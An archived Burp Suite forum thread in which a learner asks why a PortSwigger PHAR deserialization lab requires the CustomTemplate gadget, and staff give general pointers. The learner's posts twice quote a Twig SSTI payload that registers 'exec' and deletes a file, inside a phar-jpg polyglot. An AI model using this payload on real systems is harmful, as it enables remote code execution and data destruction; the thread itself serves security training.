Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Why Do I need the CustomTemplate class to solve PHAR deserialization lab?

Guillaume | Last updated: Nov 13, 2023 04:23PM UTC

To solve the lab, I need to upload a polyglot JPG with a malicious code inside. To do this, I used this tool: https://github.com/kunte0/phar-jpg-polyglot Then, until the phar jpg file is uploaded on the server, I need to call it through the phar:// stream. It is trivial to find the good path. NB: If I add a %00 on the path, the server returns an error and indicates the usage of file_exists so if my understanding is good, it means all deserialized objects inside the jpg file will be deserialized. Then, it is possible to download source code inside cgi-bin folder. I see that the class Blog has the magic method wake_up with a SSTI vulnerability inside. So, if I serialized the following code inside my JPG file thanks to the phar-jpg-polyglot project: class Blog {} $object = new Blog(); $object->user = 'carlos'; $object->desc = '{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}'; It is supposed to work, no? But it is not the case and I need to use the class CustomTemplate and I don't understand why.

Michelle, PortSwigger Agent | Last updated: Nov 14, 2023 10:33AM UTC

Hi Have you tried following along with the Community solution video? This goes into a bit more detail on the steps, so might help you piece together the bits of information and understand why certain steps are needed.

Guillaume | Last updated: Nov 14, 2023 07:28PM UTC

Yes I read the solution and saw the related videos and I don't understand the explanation concerning the usage of the class CustomTemplate. I don't understand why I cannot use the Blob class alone. With the __wake method if I serialized a Blob object inside the JPG phar files if I use the stream phar:// on the image because the avatar webpage uses file_exists, the Blob object should be deserialized and the SSTI executed but it is not the case.

Michelle, PortSwigger Agent | Last updated: Nov 15, 2023 03:39PM UTC

Hi Thanks for the update. We'll have a chat with the team and get back to you shortly.

Michelle, PortSwigger Agent | Last updated: Nov 17, 2023 01:36PM UTC

Hi I've had a quick look at this lab with the team. In step 2, "In Burp Repeater, request GET /cgi-bin to find an index that shows a Blog.php and CustomTemplate.php file. Obtain the source code by requesting the files using the .php~ backup extension", we find that the files referenced and so the classes declared within them already exist and are referenced on the server. Using this information you can infer how the blog is set up and look into swapping out some of the classes with your own. There are a few other labs, such as 'Arbitrary object injection in PHP' (https://portswigger.net/web-security/deserialization/exploiting/lab-deserialization-arbitrary-object-injection-in-php) that also use a similar setup, so if you've not already worked through the other labs this may help deepen your understanding.

Guillaume | Last updated: Nov 17, 2023 03:42PM UTC

I downloaded the source code and I don't have any problem with this. My problem is I don't understand why I need the CustomTemplate object to initiate the chain gadget. If I serialized the following code inside my JPG file thanks to the phar-jpg-polyglot project: class Blog {} $object = new Blog(); $object->user = 'carlos'; $object->desc = '{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("rm /home/carlos/morale.txt")}}'; It is supposed to work, no? But it is not the case and I need to use the class CustomTemplate and I don't understand why.

Michelle, PortSwigger Agent | Last updated: Nov 20, 2023 10:25AM UTC

Hi I’m afraid we can’t provide dedicated mentoring for individual labs. This is one of the expert-level labs, so it is designed to require more investigation to find the solution. Web applications work in arbitrary ways, and with this lab, we're trying to provide more challenges around working out what's happening within the application and why to then in turn figure out how they can be exploited.

Guillaume | Last updated: Nov 20, 2023 10:04PM UTC